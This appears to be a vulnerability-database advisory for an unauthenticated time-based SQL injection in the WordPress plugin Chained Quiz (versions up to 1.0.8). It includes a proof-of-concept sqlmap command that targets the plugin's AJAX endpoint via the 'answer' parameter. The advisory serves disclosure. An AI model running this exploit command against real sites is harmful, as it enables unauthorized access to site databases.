Lucene search

K
wpvulndbÇlirim EminiWPVDB-ID:FAA47CAE-BCCD-49D6-A3CB-2E811EBAB9FD
HistoryAug 16, 2018 - 12:00 a.m.

Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection

2018-08-1600:00:00
Γ‡lirim Emini
wpscan.com
10

0.01 Low

EPSS

Percentile

83.8%

WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the β€˜answer’ and β€˜answers’ parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the β€œ$answer” backend variable. Privileges required: None

PoC

The following exploit will cause the SQL query to execute and sleep for 10 seconds: Using SQLMAP: sqlmap -u β€œhttp://target/wp-admin/admin-ajax.php” --data=β€œanswer=1*&question;_id=1&quiz;_id=1&post;_id=5&question;_type=radio&points;=0&action;=chainedquiz_ajax&chainedquiz;_action=answer&total;_questions=1” --dbms=MySQL --technique T

CPENameOperatorVersion
chained-quizlt1.0.9

0.01 Low

EPSS

Percentile

83.8%

Related for WPVDB-ID:FAA47CAE-BCCD-49D6-A3CB-2E811EBAB9FD